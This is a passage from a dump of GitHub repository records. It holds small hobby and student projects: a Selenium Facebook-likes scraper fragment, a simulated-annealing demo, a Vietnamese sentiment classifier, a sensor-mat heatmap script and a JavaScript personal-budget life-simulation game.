driver.find_element_by_id('pass')\r\npassword_box.send_keys(pwd)\r\n\r\nlogin_btn = driver.find_element_by_id('u_0_b')\r\nlogin_btn.submit()\r\n\r\nsleep(3)\r\n\r\ndriver.get(\"https://mbasic.facebook.com/ufi/reaction/profile/browser/fetch/?limit=150&total_count=141&ft_ent_identifier=170515301123900\")\r\n\r\npage = driver.page_source\r\nsoup = BeautifulSoup(page, \"html.parser\")\r\nnames = soup.find_all(class_='bj')\r\nsleep(2)\r\n\r\npeople_who_liked_post_1 = []\r\n\r\nfor name in names:\r\n people_who_liked_post_1.append(name.text)\r\nprint(people_who_liked_post_1)\r\n" } ]
2
ronikobrosly/santa_route_optimization
https://github.com/ronikobrosly/santa_route_optimization
96995dfbc59dc9db0d5b0cc53f0a771172e4616c
3a93fbf422e4a3722bf99f00cc1fadb51310f341
4a2c56f51baf795590789360d456f1ee4c4cc216
refs/heads/master
2020-03-21T11:45:02.328451
2018-06-24T22:55:22
2018-06-24T22:55:22
138,520,144
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7976190447807312, "alphanum_fraction": 0.7976190447807312, "avg_line_length": 41, "blob_id": "f05fc7fabc112ea435f55719872e1720c9e423b9", "content_id": "fe7207209491d32db4e8b8c1a0a53756ab2c7f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 84, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "ronikobrosly/santa_route_optimization", "src_encoding": "UTF-8", "text": "# santa_route_optimization\nMy attempt at the \"Santa's Stolen Sleigh\" Kaggle problem\n" }, { "alpha_fraction": 0.6018396615982056, "alphanum_fraction": 0.6373193264007568, "avg_line_length": 21.41176414489746, "blob_id": "9dfda38dc9760755e276f099ebf99f8560fa8ac0", "content_id": "a9be9aacdc14d214ba98793c4bc709d04ef06818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 82, "num_lines": 34, "path": "/src/simulated_annealing_example.py", "repo_name": "ronikobrosly/santa_route_optimization", "src_encoding": "UTF-8", "text": "# A simple example of simulated annealing. \n# We're trying to optimize a random walk. Lower values are considered better. \n# After each iteration, it prints the score. It should hopefully drop quite a bit.\n\nimport numpy as np\n\nold = 500\nnew = old\ntemperature = 1.0\ncount = 0\nalpha = 0.9995\niteration_num = 10000\nnp.random.seed(555)\n\n\n# Main while loop\nwhile count < iteration_num:\n temperature *= alpha\n count += 1\n\n rand_delta = np.random.randint(-5, 15)\n new = old + rand_delta\n\n if new < old:\n old = new\n\n else:\n uniform_rand_num = np.random.uniform(0,1)\n p = np.exp(-((new - old)/temperature))\n\n if p > uniform_rand_num:\n old = new\n\n print \"Temperature: {0} \\t Score: {1}\".format(temperature, old)" } ]
2
winwise/sentiment-analysis-vietnamese
https://github.com/winwise/sentiment-analysis-vietnamese
508ed1193a3fab751ad878c4379843e5d4a93ba9
01b7d87af630ba0941e4fd52ae683227b100fff9
0f65e2f6a2cb3109ac3a2ef9770fca92db276c68
refs/heads/master
2020-08-23T02:17:21.853679
2019-10-21T22:58:51
2019-10-21T22:58:51
216,521,986
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6057866215705872, "alphanum_fraction": 0.6657624840736389, "avg_line_length": 33.216495513916016, "blob_id": "230b56234625cc6fefd9393ff47da503e7cdcbb0", "content_id": "3bff096beddde9a353048cc9b1443d30cabf2765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3349, "license_type": "no_license", "max_line_length": 105, "num_lines": 97, "path": "/projectDemo/Classify_test.py", "repo_name": "winwise/sentiment-analysis-vietnamese", "src_encoding": "UTF-8", "text": "from sklearn.datasets import load_files\nimport numpy as np\nimport re\nfrom underthesea import sent_tokenize, word_tokenize\nfrom collections import Counter\nfrom string import punctuation\n\ncorpus = load_files(\"Data\",encoding=\"utf-8\",load_content=True)\nX, y = corpus.data, corpus.target\n# Buoc 1: tien xu ly van ban\ndocuments = []\n# + Viet ham xoa cac the HTML va bieu tuong cam xuc\ndef cleanHTML(text):\n cleaner = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});<.*?>')\n cleantext = re.sub(cleaner,'',text)\n return cleantext\ndef delEmoji(text): \n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" \n u\"\\U0001F300-\\U0001F5FF\" \n u\"\\U0001F680-\\U0001F6FF\" \n u\"\\U0001F1E0-\\U0001F1FF\"\n u\"\\U00002500-\\U00002BEF\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\"\n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\"\n u\"\\u3030\"\n u\"\\xa0\"\n \"]+\", flags=re.UNICODE)\n txt = re.sub(emoji_pattern,'',text)\n txt = txt.replace(\"\\n\",\" \")\n return txt\n# Tien xu ly lan thu nhat, xoa het tat ca cac the HTML va Emoji trong X\ndef tienXuLyLan1(dcmts):\n temp = []\n for cmt in dcmts:\n cmt = cleanHTML(cmt)\n cmt = delEmoji(cmt)\n temp.append(cmt)\n return temp\ndocuments = tienXuLyLan1(X)\n# Tien xu ly lan thu hai, loai bo stop words va dau cau, gom nhom cac tu\ndef Vistopwords():\n stop_word = []\n with open(\"Vistopwords.txt\",'r+',encoding=\"utf-8\") as f_read:\n text = f_read.read()\n for word in text.split(\" \"):\n stop_word.append(word)\n f_read.close()\n punc = list(punctuation)\n stop_word = stop_word + punc\n return stop_word\ndef tienXuLyLan2(dcmts):\n sentences = []\n for cmt in dcmts:\n word_cmt = word_tokenize(cmt) # word_cmt la mot list cac tu\n sent = \"\"\n for word in word_cmt:\n if word not in Vistopwords():\n sent = sent + word + \" \"\n sentences.append(sent)\n return sentences\ndocuments = tienXuLyLan2(documents)\n# Buoc 3: Chuyen doi Text thanh Numbers dung The Bag of Words Model\nfrom sklearn.feature_extraction.text import TfidfVectorizer\ntf = TfidfVectorizer(min_df=5,max_df= 0.8,max_features=2000,sublinear_tf=True)\nX = tf.fit_transform(documents).toarray()\n# Training and Testing Sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n# Script phia tren chia du lieu thanh 2 phan 80% tap train va 20% tap test\n# Buoc 5: Su dung LogisticRegression Algorithm de train model\nfrom sklearn.linear_model import LogisticRegression\nmodel = LogisticRegression()\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nprint(confusion_matrix(y_test,y_pred))\nprint(classification_report(y_test,y_pred))\nprint(accuracy_score(y_test, y_pred))\n\n# Thu nghiem ty cho vui thoi\ntxt = [\"quán nấu ăn ngon lắm, hi vọng lần sau sẽ đến nữa\",\"dưới chất lượng cho phép\",\"không hợp vệ sinh\"]\ntxt = tienXuLyLan1(txt)\ntxt = tienXuLyLan2(txt)\nprint(txt)\ntest_txt = tf.transform(txt)\nprint(model.predict(test_txt))" }, { "alpha_fraction": 0.8148148059844971, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 39.5, "blob_id": "03bb7935e5fa8706c5c97d1192dfde70fd649270", "content_id": "b6a86018ee68a0e86e23ecfa436ed1603115e626", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 48, "num_lines": 2, "path": "/README.md", "repo_name": "winwise/sentiment-analysis-vietnamese", "src_encoding": "UTF-8", "text": "# sentiment-analysis-vietnamese\nBài toán phân tích cảm xúc tiếng Việt với Python\n" } ]
2
sikadm/sikadm.github.io
https://github.com/sikadm/sikadm.github.io
d9d8c32f3c1aaaf72a2a660ca3c3aca01b9db694
5d173db0c8b28073573707fecf150cf2e042f413
f6554fa0c6671aee2f060a217edeba196edd41e5
refs/heads/master
2020-04-28T02:01:05.370708
2019-04-29T00:03:47
2019-04-29T00:03:47
174,881,846
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5930485129356384, "alphanum_fraction": 0.6089789867401123, "avg_line_length": 19.825397491455078, "blob_id": "0030fb5b882c56aed0b8e82072f3c4ff0b8076a3", "content_id": "97458454c57654f1b2fabf34421ee073d1adf8b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 65, "num_lines": 63, "path": "/fitMatscreen.py", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "from __future__ import print_function\r\nimport serial, os\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\ncgitb.enable()\r\nform = cgi.FieldStorage() \r\n\r\nser = serial.Serial('COM6', 500000)\r\n\r\nw, h = 138, 48;\r\nmatrix = [[0 for x in range(w)] for y in range(h)]\r\n\r\n\r\ndef generate_data():\r\n\twhile not ord(ser.read()) == 0:\r\n\t\tpass\r\n\tfor y in range(h):\r\n\t\tfor x in range(w):\r\n\t\t\treadByte = ser.read()\r\n\t\t\tif ord(readByte)==0:\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tmatrix[y][x]=ord(readByte)\r\n\tprint('\\n'.join([''.join(['{:4}'.format(item) for item in row]) \r\n for row in matrix]))\r\n\treturn matrix\r\n\t \r\ndef update(data):\r\n mat.set_data(data)\r\n return mat\r\n\t\r\ndef data_gen():\r\n while True:\r\n yield generate_data()\r\n\t\t\r\nfig, ax = plt.subplots()\r\nmat = ax.matshow(generate_data(), vmin=0, vmax=100)\r\nax.autoscale(False)\r\nplt.colorbar(mat)\r\nani = animation.FuncAnimation(fig, update, data_gen)\r\n\r\nplt.show()\r\n\r\nprint(\"Content-type:text/html\\r\\n\\r\\n\")\r\nprint(\"<html>\")\r\nprint(\"<head>\")\r\nprint(\"<title>Fit Mat</title>\")\r\nprint(\"<style></style>\")\r\nprint(\"</head>\")\r\nprint(\"<body>\")\r\nprint(\"<h2 align='center'>Fit Mat sensing data</h2>\")\r\n\r\nprint(\"<form align='right' action='fitMat.html'>\")\r\nprint(\"Return to home page<br>\")\r\nprint(\"<input type='submit' value='Home'>\")\r\nprint(\"</form>\")\r\nprint(\"<br>\")\r\n\r\n\r\n\r\nprint(\"</body>\")\r\nprint(\"</html>\")\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6413238048553467, "alphanum_fraction": 0.6556350588798523, "avg_line_length": 31.91176414489746, "blob_id": "f91fdfed1ac05c451ca28899384e835d6b14cbc7", "content_id": "22a04c7ef71fcb5487e6de11644154ddb15383dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1118, "license_type": "no_license", "max_line_length": 83, "num_lines": 34, "path": "/js/calc.js", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "var remaining;\nfunction remainingBalance() {\n //grab interest rate\n var r = document.getElementById(\"interest-input\").value;\n r = (r / 100) / 12;\n //grab loan amount\n var loan = document.getElementById(\"loan-input\").value;\n //grab number of payments\n var payments = document.getElementById(\"payments-input\").value;\n //grab monthly payment\n var monthly = document.getElementById(\"month-input\").value;\n\n var q = (1+r)** payments;\n remaining = q * loan - ( (q-1) / r ) * monthly;\n\n document.getElementById(\"remaining-amount\").textContent = remaining.toFixed(2);\n}\n\nvar monthly;\nfunction minPayment() {\n //grab interest rate\n var r = document.getElementById(\"interest-input\").value;\n r = (r / 100) / 12;\n //grab loan amount\n var loan = document.getElementById(\"loan-input\").value;\n //grab number of payments\n var payments = document.getElementById(\"payments-input\").value;\n var remaining = loan;\n\n var q = (1+r)** payments;\n monthly = r * ( (q * loan - remaining) / ( q - 1 ));\n\n document.getElementById(\"min-amount\").textContent = monthly.toFixed(2);\n}" }, { "alpha_fraction": 0.6964253187179565, "alphanum_fraction": 0.711917519569397, "avg_line_length": 27.60172462463379, "blob_id": "79fbcd8700e59db97bc5ee971d50b49a7bcc1a9f", "content_id": "6fa4ce118a9c2783f756080c80365941120a88ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 16589, "license_type": "no_license", "max_line_length": 181, "num_lines": 580, "path": "/js/budgetQ.js", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "window.onload = function() {\n\tvar salaryForm = document.getElementById(\"salary\");\n\tvar loanForm = document.getElementById(\"loan\");\n\tvar money = document.getElementById(\"money_tracking\");\n\tvar option1 = document.getElementById(\"option1\");\n\tvar option2 = document.getElementById(\"option2\");\n\tvar option3 = document.getElementById(\"option3\");\n\tvar option4 = document.getElementById(\"option4\");\n\tvar question = document.getElementById(\"question\");\n\tvar bubble = document.getElementById(\"container\");\n\tvar thought = document.getElementById(\"thought\");\n\tvar option1box = document.getElementById(\"box1\");\n\tvar option2box = document.getElementById(\"box2\");\n\tvar option3box = document.getElementById(\"box3\");\n\tvar option4box = document.getElementById(\"box4\");\n\tvar W2form = document.getElementById(\"W2\");\n\tvar form1040 = document.getElementById(\"1040form\");\n\tvar progress = document.getElementById(\"progressbar\");\n\tvar copyright = document.getElementById(\"iconrights\");\n\tvar spendingButton = document.getElementById(\"spendings\");\n\tvar moveButton = document.getElementById(\"move\");\n\tvar marriageButton = document.getElementById(\"marriage\");\n\tvar jobButton = document.getElementById(\"jobStatus\");\n\tvar retireButton = document.getElementById(\"retire\");\n\tvar carButton = document.getElementById(\"car\");\n\tvar fwdYear = document.getElementById(\"yearProgression\");\n\tvar spendingTbl = document.getElementById(\"spendingTableModal\");\n\tvar closeSpending = document.getElementById(\"closeSpTbl\");\n\tvar year = 0;\n\tvar sideBar = document.getElementById(\"sideBar\");\n\n\tmoveButton.style.display = \"none\";\n\tmarriageButton.style.display = \"none\";\n\tjobButton.style.display = \"none\";\n\tretireButton.style.display = \"none\";\n\tcarButton.style.display = \"none\";\n\tfwdYear.style.display = \"none\";\n\tprogress.style.display = \"none\";\n\tbubble.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\tmoney.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tW2form.style.display = \"none\";\n\n\tspendingButton.onclick = function() {\n\t\tspendingTbl.style.display = \"block\";\n\t};\n\n\tcloseSpending.onclick = function() {\n\t\tspendingTbl.style.display = \"none\";\n\t};\n\n\t// When the user clicks anywhere outside of a modal, close it\n\twindow.onclick = function(event) {\n\t\tif (event.target == spendingTbl) {\n\t spendingTbl.style.display = \"none\";\n\t }\n\t};\n\n\tmoveButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to move?\")){\n\t\t\thousingLocation();\n\t\t}\n\t};\n\n\tvar couple;\n\tmarriageButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to get married?\")){\n\t\t\tcouple = 1;\n\t\t\tx = x*2;\n\t\t}\n\t};\n\n\tjobButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to change jobs?\")){\n\t\t\tincome();\n\t\t\tif (couple == 1) {\n\t\t\t\tx = x*2;\n\t\t\t}\n\t\t}\n\t};\n\n\tretireButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to retire?\")) {\n\t\t\tx = 0;\n\t\t}\n\t};\n\n\tcarButton.onclick = function() {\n\t\tif (confirm(\"Do you need to change your vehicle situation?\")){\n\t\t\tvehicle();\n\t\t}\n\t};\n\n\tfwdYear.onclick = function() {\n\t\tif (confirm(\"Ready for another year?\")) {\n\t\t\tif (year >= 95) {\n\t\t\t\talert (\"You lived a happy life! Review how your savings and spendings added up\");\n\t\t\t}\n\t\t\telse {\n\t\t\t\tyear = year + 10;\n\t\t\t\tupdateYear();\n\t\t\t}\n\t\t}\n\t};\n\n\toption1box.onclick = function() {\n\t\teducation();\n\t};\n\tfunction education() {\n\t\tquestion.style.display = \"block\";\n\t\twindow.year = 18;\n\t\toption2box.style.display = \"block\";\n\t\tprogress.style.display = \"block\";\n\t\tprogress.style.width = year + '%';\n\t\tprogress.textContent = year + \" yrs old\";\n\t\tquestion.textContent = \"What is (or will be) your highest level of education?\";\n\t\toption1.textContent = \"High School\";\n\t\toption2.textContent = \"College\";\n\t\toption1box.setAttribute(\"onClick\", \"hsGraduate()\");\n\t\toption2box.setAttribute(\"onClick\", \"collegeGraduate()\");\n\t\tbubble.style.display = \"block\";\n\t\tthought.textContent = \"Those with college degrees get paid more on average than those without but also have to spend more on education\";\n\t};\n\nfunction hsGraduate() {\n\tquestion.textContent = \"Will you go to Trade School or get a job?\";\n\toption1.textContent = \"Trade School\";\n\toption2.textContent = \"Job\";\n\toption1box.addEventListener(\"click\", tradeSchool);\n\toption2box.addEventListener(\"click\", income);\n\tthought.textContent = \"Those with trade skills often make more than those who don't have any higher education.\";\n\n};\n\nfunction tradeSchool() {\n\twindow.year = 20;\n\tupdateBar();\n\tincome();\n};\n\nfunction collegeGraduate() {\n\tconsole.log(\"college Graduate b4 update: \" + year);\n\tthought.textContent = \"Going to grad school could pay off for some majors; Others may want to consider if spending the extra money and time is worthwhile!\";\n\toption3box.style.display = \"none\";\n\twindow.year = 22;\n\tupdateBar();\n\tconsole.log(\"college graduate after update: \" + year);\n\tquestion.textContent = \"Will you continue on with school or start your career?\";\n\toption1.textContent = \"Graduate School\";\n\toption2.textContent = \"Career\";\n\toption1box.addEventListener(\"click\", gradSchool);\n\toption2box.addEventListener(\"click\", loan);\n};\nfunction gradSchool() {\n\tthought.textContent = \"Although a Masters may take less time, some careers require a Doctorate to be taken seriously!\";\n\twindow.year = 22;\n\tupdateBar();\n\tquestion.textContent = \"What kind of degree are you getting?\";\n\toption1.textContent = \"Doctorate\";\n\toption2.textContent = \"Masters\";\n\toption3box.style.display = \"none\";\n\toption1box.addEventListener(\"click\", doctorate);\n\toption2box.addEventListener(\"click\", masters);\t\n};\n\nfunction doctorate() {\n\twindow.year = 26;\n\tupdateBar();\n\tloan();\n};\n\nfunction masters() {\n\twindow.year = 24;\n\tupdateBar();\n\tloan();\n};\n\nfunction loan() {\n\tconsole.log(\"loan before update: \" + year);\n\tbubble.style.display = \"block\";\n\tloanForm.style.display = \"block\";\n\tthought.textContent = \"Filling out your FAFSA each year can help you get low interest loans! You'll end up paying less in interest than with private loans.\";\n\tupdateBar();\n\tconsole.log(\"loan after update: \" + year);\n\tsalaryForm.style.display = \"none\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tquestion.textContent = \"How much will you have in loans?\";\n};\n\nvar loanPymt; //global variable of loan payment\nvar loanLength; //global variable of loan length\nfunction validateForm2() {\n\tloanPymt = document.forms[\"loan\"][\"monthly_loan\"].value;\n\tloanLength = document.forms[\"loan\"][\"loan_length\"].value;\n\tif (loanPymt == \"\") {\n\t\talert(\"Loan payment must be filled out\");\n\t}\n\telse if (isNaN(loanPymt)){\n\t\talert(\"Loan payment can only contain numbers\");\n\t}\n\telse { \n\t\tif (loanLength == \"\") {\n\t\t\talert(\"Loan length must be filled out\");\n\t\t}\n\t\telse if (isNaN(loanLength)) {\n\t\t\talert(\"Loan length can only contain numbers\");\n\t\t}\n\t\telse {\n\t\t\tincome();\n\t\t}\n\t}\n};\n\nfunction income() {\n\tbubble.style.display = \"block\";\n\tloanForm.style.display = \"none\";\n\tthought.textContent = \"Depending on your education choices, some careers (and salaries) may be out of reach\";\n\tupdateBar();\n\tsalaryForm.style.display = \"block\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tquestion.textContent = \"Income\";\n};\n\nvar x; //global variable of salary\nfunction validateForm() {\n\tx = document.forms[\"salary\"][\"yearly_salary\"].value;\n\tif (x == \"\") {\n\t\talert(\"Salary must be filled out\");\n\t}\n\telse if (isNaN(x)){\n\t\talert(\"Salary can only contain numbers\");\n\t}\n\telse {\n\t\tif (confirm(\"Ready to get started?\")) {\n\t\t\ttaxes();\n\t\t}\n\t}\n};\n\nfunction taxes() {\n\tmoney.style.display = \"none\";\n\tprogress.style.display = \"none\";\n\tcopyright.style.display = \"none\";\n\tbubble.style.display = \"none\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"Tax forms\";\n\toption1.textContent = \"Click to continue\";\n\toption1box.addEventListener(\"click\", retirement);\n\tW2form.style.display = \"block\";\n\tform1040.style.display = \"block\";\t\n};\n\nvar retirementSavings;\nvar retirementPercent;\nvar bank;\nfunction retirement() {\n\tmoney.style.display = \"block\";\n\tmoney.textContent = \"$\" + x;\n\tbank = x;\n\tloanForm.style.display = \"none\";\n\tbubble.style.display = \"block\";\n\tcopyright.style.display = \"block\";\n\tprogress.style.display = \"block\";\n\tW2form.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"What percent of your salary are you putting into a 401K?\"\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"block\";\n\toption1.textContent = \"0%\";\n\toption2.textContent = \"5%\";\n\toption3.textContent = \"10%\";\n\toption4.textContent = \"20%\";\n\toption1box.addEventListener(\"click\", retire0);\n\toption2box.addEventListener(\"click\", retire5);\n\toption3box.addEventListener(\"click\", retire10);\n\toption4box.addEventListener(\"click\", retire20);\n};\n\nfunction retire0() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = 0;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire5() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = 0.05;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire10() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = .1;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire20() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = .2;\n\tretirementFund();\n\thousingLocation();\n};\n\nvar retirementSavings;\nfunction retirementFund() {\n\twindow.retirementSavings = retirementPercent*x;\n\twindow.bank = bank - retirementSavings;\n\tmoney.textContent = \"$\" + bank;\n};\n\nvar housingMultiplier;\nfunction housingLocation() {\n\tloanForm.style.display = \"none\";\n\tthought.textContent = \"Be aware that in some cities (NYC, Chicago, LA), rent will be much more expensive, while cheaper in others (Cincinnati). Also consider your commute to work!\"\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tW2form.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\tquestion.textContent = \"Where will you live (location)?\";\n\toption1.textContent = \"City\";\n\toption2.textContent = \"Suburbs\";\n\toption1box.addEventListener(\"click\", city);\n\toption2box.addEventListener(\"click\", suburbs);\n};\n\nfunction city() {\n\thousingMultiplier = 2;\n\thousingType();\n};\n\nfunction suburbs() {\n\thousingMultiplier = 1;\n\thousingType();\n};\n\nvar rent;\nfunction housingType() {\n\tbubble.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"Where will you live?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"none\";\n\toption1.textContent = \"High-End Apartment\";\n\toption2.textContent = \"Cheap Apartment\";\n\toption3.textContent = \"House\";\n\toption1box.addEventListener(\"click\", highEndApt);\n\toption2box.addEventListener(\"click\", cheapApt);\n\toption3box.addEventListener(\"click\", house);\n};\n\nfunction highEndApt() {\n\t/*option1box.removeEventListener(\"click\", highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 8400;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nfunction cheapApt() {\n\t/*option1box.removeEventListener(\"click\", highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 6600;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nfunction house() {\n\t/*option1box.removeEventListener(\"click\", highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 10000;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nvar roommateMultiplier;\nfunction roommate() {\n\tbubble.style.display = \"block\";\n\tthought.textContent = \"Having a roommate may make your living situation more cost efficient!\";\n\tsalaryForm.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"none\";\n\tquestion.textContent = \"Will you have a roommate?\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption1box.addEventListener(\"click\", shareLiving);\n\toption2box.addEventListener(\"click\", dontShareLiving);\n};\n\nfunction shareLiving() {\n\troommateMultiplier = 0.5;\n\thousingUpdate()\n};\n\nfunction dontShareLiving() {\n\troommateMultiplier = 1;\n\thousingUpdate();\n};\n\nvar yearlyRent;\nfunction housingUpdate(){\n\tyearlyRent = roommateMultiplier*rent*housingMultiplier;\n\tmoveButton.style.display = \"block\";\n\tconsole.log(\"yearly rent: \" + yearlyRent);\n\tconsole.log(\"bank before rent: \" + bank);\n\tbank = bank - yearlyRent;\n\tconsole.log(\"bank after rent: \" + bank);\n\tmoney.textContent = \"$\" + bank;\n\tvehicle();\n};\n\nfunction vehicle() {\n\tquestion.textContent = \"Do you need a vehicle? (drive to work etc.)\";\n\tsalaryForm.style.display=\"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption3box.style.display = \"none\";\n\toption1box.addEventListener(\"click\", vehicleCost);\n\toption2box.addEventListener(\"click\", healthIns);\n};\n\nvar carCost;\nfunction vehicleCost() {\n\tquestion.textContent = \"What are your car payments like?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption1.textContent = \"Car already paid off (no insurance/parents pay)\";\n\toption2.textContent = \"Car paid off but insurance being paid\";\n\toption3.textContent = \"Car payment and insurance\";\n\tbubble.style.display = \"none\";\n\toption3box.style.display = \"car and insurance payments monthly\";\n\toption1box.addEventListener(\"click\", nocarpymt);\n\toption2box.addEventListener(\"click\", carIns);\n\toption3box.addEventListener(\"click\", carInsPymt);\n\tcarButton.style.display = \"block\";\n};\n\nfunction nocarpymt() {\n\tcarCost = 0;\n\tcarUpdate();\n};\n\nfunction carIns() {\n\tcarCost = 120;\n\tcarUpdate();\n};\n\nfunction carInsPymt() {\n\tcarCost = 400;\n\tcarUpdate();\n};\n\nfunction carUpdate() {\n\tbank = bank - carCost;\n\tmoney.textContent = \"$\" + bank;\n\thealthInsurance();\n};\n\nvar healthInsCost;\nfunction healthInsurance() {\n\tquestion.textContent = \"Do you have health insurance?\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"block\";\n\toption1.textContent = \"Yes, provided through my job\";\n\toption2.textContent = \"Yes, still apart of my parents\";\n\toption3.textContent = \"Yes, paid for by self\";\n\toption4.textContent = \"No\";\n\toption1box.addEventListener(\"click\", jobIns);\n\toption2box.addEventListener(\"click\", parIns);\n\toption3box.addEventListener(\"click\", selfIns);\n\toption4box.addEventListener(\"click\", noIns);\n};\n\nfunction jobIns() {\n\thealthInsCost = 1100;\n\tInsUpdate();\n};\n\nfunction parIns() {\n\thealthInsCost = 0;\n\tInsUpdate();\n};\n\nfunction selfIns() {\n\thealthInsCost = 6200;\n\tInsUpdate();\n};\n\nfunction noIns() {\n\thealthInsCost = 0;\n\tInsUpdate();\n};\n\nfunction InsUpdate() {\n\tbank = bank - healthInsCost;\n\tmoney.textContent = \"$\" + bank;\n\tsummary();\n};\n\nfunction summary() {\n\tbubble.style.display = \"none\";\n\tquestion.textContent = \"From this point on, your life events occur when you want them to. Use the side buttons to continue your life.\";\n\toption1box.style.display = \"block\";\n\toption1.textContent = \"Exit\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\tmoveButton.style.display = \"block\";\n\tmarriageButton.style.display = \"block\";\n\tretireButton.style.display = \"block\";\n\tcarButton.style.display = \"block\";\n\tfwdYear.style.display = \"block\";\n};\n\nfunction marriage() {\n\tquestion.textContent = \"Do you want to get married?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption1box.addEventListener(\"click\", children);\n\toption2box.addEventListener(\"click\", children);\n};\n\nfunction updateBar() {\n\tprogress.style.width = year + \"%\";\n\tprogress.textContent = year + \" yrs old\";\n};\n/*\nwhen (year>65) {\n\n};\n*/\n\n$(\"#salary\").submit(function(e) {\n\te.preventDefault();\n});\t\n$(\"#loan\").submit(function(e) {\n\te.preventDefault();\n});\n};\n" } ]
3
demmanuel2004/Create-Task
https://github.com/demmanuel2004/Create-Task
0984348f1760957d8f1292d56ff4adab606a458c
